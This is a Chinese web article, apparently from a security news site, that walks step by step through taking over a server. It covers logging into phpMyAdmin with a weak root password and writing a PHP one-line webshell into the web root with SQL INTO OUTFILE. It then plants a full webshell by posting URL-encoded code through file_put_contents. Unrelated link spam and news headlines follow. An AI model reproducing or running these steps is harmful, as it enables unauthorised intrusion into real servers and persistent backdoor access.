木马GetShell的另类姿势
扫描二维码随身看资讯
使用手机 二维码应用 扫描右侧二维码,您可以
1. 在手机上细细品读~
2. 分享给您的微信好友或朋友圈~
扫C段时发现一机器有phpMyAdmin服务,小编就尝试了一下弱口令,root123果断进入,然后就开始了接下来的一大串资讯内容。
探测IP为某云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:
一句话木马原形:
assert($_POST[-7]);
写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):
use test;
drop table if exists temp;
create table temp (cmd text NOT NULL);
insert into temp (cmd) values(" ");
select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';
drop table if exists temp;
0×02 处理大马
用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。
这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。
首先在本地把大马处理好以便于作为post参数:
用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。
C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):
strip.php:
<!--?php
echo php_strip_whitespace('strip_shell.php');
?-->
urlencode.php:
<!--?php
echo urlencode(file_get_contents('urlencode_shell.php'));
?-->
执行过程如下(注意文件名称变化和执行顺序):
最后就要用到Advanced REST client插件
这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容"));
POST表单
ok,已经成功GetShell。- 如何提高高二学生语文成绩?四季课文原文
- 《机长的四季教训》原文
- 四季酒店集团区域副总裁:四季酒店集团业务增长超出预期。四季酒店集团在西南市场的规划布局,四季
- 中国的四个季节|北京中轴线上的冬天
- 华发四季(上海浦东)房产网站丨浦东华发四季欢迎您丨楼盘详情及户型图-四季
- 四时看新疆:看新疆追雪花:全面布局“山水”产业链新能源发展“提速”四时
- 鹿晗现身云南录制综艺节目《五哈》第四期。他穿着白色运动衫看起来非常帅气! 2023年12月14日
- 四季周周有赛事勾当 崇礼冬奥场馆今岁首年月步实现四时经营
- 四季公园四季公园(华发公园四季)首页网站珠海华发欢迎您楼盘详情户型价格
- 尽享山水四时美景。 《画山水》里的四时美景在哪里? 2023年12月8日四个季节
- 四个季节对应的月份
- 四季印象兰亭-苏州(四季印象兰亭)房产详情-房价-电话号码-社区环境
-
CVE-2015-3839漏洞能够使短信程序崩溃
研究人员在安卓系统中发现了两个新漏洞,它们可以破坏手机和平板
-
操控Bunitu僵尸网络的网络犯罪分子们可以感染代理服务器
操控Bunitu僵尸网络的网络犯罪分子们可以利用Bunitu僵尸网络来感
-
机场安检设备在黑客攻击面前不堪一击
现在,通过一台普通的笔记本电脑,黑客就可以入侵机场的安全网络了,机
-
DD4BC黑客组织用DDoS敲诈勒索比特币 近来活动加剧
自从去年9月以来,一个名字为DD4BC的黑客组织的攻击敲诈行为被曝光